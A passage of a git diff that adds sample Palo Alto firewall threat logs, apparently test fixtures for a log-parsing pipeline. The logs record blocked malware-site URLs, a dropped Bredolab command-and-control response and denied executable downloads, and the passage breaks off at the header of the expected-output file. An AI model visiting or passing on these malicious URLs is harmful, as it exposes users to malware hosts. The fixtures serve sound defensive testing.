04:39:34,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:35,26198,1,59237,80,0,0,0x200000,tcp,block-url,"nolagtime.com/conn/?JKV_1RWbUUdIfRUWUaITfdIfbREdYEYdfTTRI-6XBB_1WQR-6GF5_1AU-6LC6_1Y-gW-gEUQQ-gE-tsDF6K5D_rpX51_rR-t-66FC_1Q_fQ_fQ_fQ_fQ_fQ_fQ_fQ-62BG_1Q-672V_1YOR-6N8J_1Q-6252_1WQRR-69LV_1-65GZ_1W-6",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:47:17 1,2012/10/30 09:47:17,01606001116,THREAT,url,1,2012/04/10 04:39:35,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:36,26056,1,59238,80,0,0,0x200000,tcp,block-url,"nolagtime.com/gwc.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:51:03 1,2012/10/30 09:51:03,01606001116,THREAT,url,1,2012/04/10 04:38:19,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:20,25465,1,59010,80,0,0,0x200000,tcp,block-url,"karavan.us/bon/index.php",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:51:23 1,2012/10/30 09:51:23,01606001116,THREAT,url,1,2012/04/10 04:38:14,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:15,24316,1,58969,80,0,0,0x200000,tcp,block-url,"findnolimits.com/go.php?sid=1",(9999),dead-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:51:33 1,2012/10/30 09:51:33,01606001116,THREAT,url,1,2012/04/10 04:38:12,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,17258,1,58941,80,0,0,0x200000,tcp,block-url,"bizoplata.ru/moun.html",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, +Oct 30 09:51:33 1,2012/10/30 09:51:33,01606001116,THREAT,url,1,2012/04/10 04:38:12,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,24735,1,58942,80,0,0,0x200000,tcp,block-url,"bizoplata.ru/palast.html",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, +Oct 30 09:53:33 1,2012/10/30 09:53:33,01606001116,THREAT,spyware,1,2012/04/10 04:37:28,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:33,23497,1,80,58849,0,0,0x200000,tcp,drop-all-packets,"controller.php",Bredolab.Gen Command and Control Traffic(13024),any,critical,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Oct 30 09:53:38 1,2012/10/30 09:53:38,01606001116,THREAT,url,1,2012/04/10 04:37:32,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:32,23711,1,58856,80,0,0,0x200000,tcp,block-url,"www.15min.it/",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Canada,0, +Oct 30 09:53:48 1,2012/10/30 09:53:48,01606001116,THREAT,url,1,2012/04/10 04:37:27,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:27,23659,1,58847,80,0,0,0x200000,tcp,block-url,"tubemov.com/",(9999),adult-and-pornography,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:53:58 1,2012/10/30 09:53:58,01606001116,THREAT,url,1,2012/04/10 04:37:25,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:25,23782,1,58841,80,0,0,0x200000,tcp,block-url,"pagesinxt.com/?dn=teenstube.us&flrdr=yes&nxte=js",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Virgin Islands British,0, +Oct 30 09:55:23 1,2012/10/30 09:55:23,01606001116,THREAT,url,1,2012/04/10 04:37:05,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:06,23239,1,58795,80,0,0,0x200000,tcp,block-url,"movfree.com/",(9999),spyware-and-adware,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:56:23 1,2012/10/30 09:56:23,01606001116,THREAT,url,1,2012/04/10 04:36:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:52,22479,1,58753,80,0,0,0x200000,tcp,block-url,"gometascan.com/",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:57:33 1,2012/10/30 09:57:33,01606001116,THREAT,url,1,2012/04/10 04:36:39,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:40,21458,1,58708,80,0,0,0x200000,tcp,block-url,"antivirus-powerful-scannerv2.com/download/Install_11-1.exe",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:57:38 1,2012/10/30 09:57:38,01606001116,THREAT,url,1,2012/04/10 04:36:38,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:39,21577,1,58707,80,0,0,0x200000,tcp,block-url,"antivirus-powerful-scannerv2.com/1/?id=11-1&back==TQzyDTyMUQNMI=N",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,"basdzsdas.com/poker/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,"basdzsdas.com/poker/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,file,1,2012/04/10 04:19:59,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,"uLLGRaXP.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,"basdzsdas.com/poker/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:51:29,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:51:34,37983,1,80,61220,0,0,0x200000,tcp,deny,"FunkyEmoticons_setup.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:54:33,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:54:38,41989,1,80,61726,0,0,0x200000,tcp,deny,"52hxw.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,China,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,url,1,2012/04/10 05:01:00,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 05:01:00,49238,1,63007,80,0,0,0x200000,tcp,block-url,"softsellfast.com/test/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:45:17,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:45:23,21592,1,80,60212,0,0,0x200000,tcp,deny,"setup.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Netherlands,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:46:16,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:46:22,33760,1,80,60392,0,0,0x200000,tcp,deny,"Live-Player_setup.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:39,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:39,28723,1,59709,80,0,0,0x200000,tcp,block-url,"boialex.narod.ru/config.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, +Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:42,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:42,28932,1,59721,80,0,0,0x200000,tcp,block-url,"edw-melon.narod.ru/config.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, +Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:51,28953,1,59752,80,0,0,0x200000,tcp,block-url,"maximtushin.narod.ru/config.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, +Mar 25 23:59:17 1,2013/03/25 23:59:17,01606001116,THREAT,file,1,2012/04/10 04:19:59,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,"uLLGRaXP.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,THREAT,url,1,2012/04/10 04:09:01,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:09:01,55402,1,63183,80,0,0,0x200000,tcp,block-url,"marketingsoluchion.biz/fkn/config.bin",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:27,192.168.0.6,175.16.199.1,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:32,25217,1,1047,80,0,0,0x200000,tcp,alert,"default.aspx",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:29,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:34,25653,1,80,1039,0,0,0x200000,tcp,alert,"sck.aspx",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:32,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:37,25717,3,80,1064,0,0,0x200000,tcp,alert,"ADSAdClient31.dll",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:33,192.168.0.6,175.16.199.1,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:38,25290,1,1048,80,0,0,0x200000,tcp,alert,"c.gif",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:37,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:42,25932,1,80,1071,0,0,0x200000,tcp,alert,"csi",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:50:12,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,picard,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:50:17,28264,1,57502,80,0,0,0x200000,tcp,alert,"internal-tuner.pandora.com",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:58:18,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:58:22,29312,1,80,57876,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,file,1,2012/04/09 08:22:27,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:22:31,26747,1,80,1082,0,0,0x200000,tcp,deny,"about.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Ukraine,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:11:43,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:11:48,19205,1,80,50986,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:02,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:07,19360,1,80,51716,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:39,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:44,19696,1,80,52119,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:16:03,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:16:08,19679,1,80,52411,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:18:14,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:18:19,19448,1,52366,80,0,0,0x200000,tcp,alert,"__utm.gif",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:25:04,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:25:09,20422,1,80,53026,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:36:04,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:36:09,21267,1,80,53809,0,0,0x200000,tcp,alert,"nav_logo107.png",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:08,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:13,24567,1,80,55912,0,0,0x200000,tcp,alert,"Eadweard_Muybridge",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:44,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:49,24646,1,80,55916,0,0,0x200000,tcp,alert,"load.php",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:16:57,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:17:01,25874,1,80,1046,0,0,0x200000,tcp,reset-both,"8fe44cb728c0f40750c64ee906eb72.css",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:06:41,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:06:46,2175,1,80,61734,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:12:52,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:12:57,3046,1,80,62292,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:07:49,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,rss,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:07:54,1560,1,80,64669,0,0,0x200000,tcp,alert,"appcast.xml",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:44,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:48:48,16852,1,80,65265,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:59,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:49:05,15948,1,80,64979,0,0,0x200000,tcp,alert,"csi",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:50:14,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:50:19,17028,1,80,49432,0,0,0x200000,tcp,alert,"index.php",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:51:34,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:51:39,15878,1,80,49722,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:53:41,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:53:47,16602,1,49681,80,0,0,0x200000,tcp,alert,"__utm.gif",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:35,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:54:41,17433,1,80,50108,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:55,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:55:00,17104,1,80,50387,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:44:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,jordy,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:44:55,63706,1,59781,80,0,0,0x200000,tcp,alert,"internal-tuner.pandora.com",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:45:45,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:45:50,65257,1,80,60005,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:49:17,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:49:22,537,1,80,60443,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:53:41,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:53:45,914,1,80,60822,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:23,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:28,1475,1,80,61105,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:52,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-analytics,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:57,883,1,80,60782,0,0,0x200000,tcp,alert,"ga.js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 04:03:55,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:04:00,1965,1,80,61470,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-threat-sample.log-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-threat-sample.log-expected.json index 4fc03f52005..0f69e78be65 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-threat-sample.log-expected.json +++ 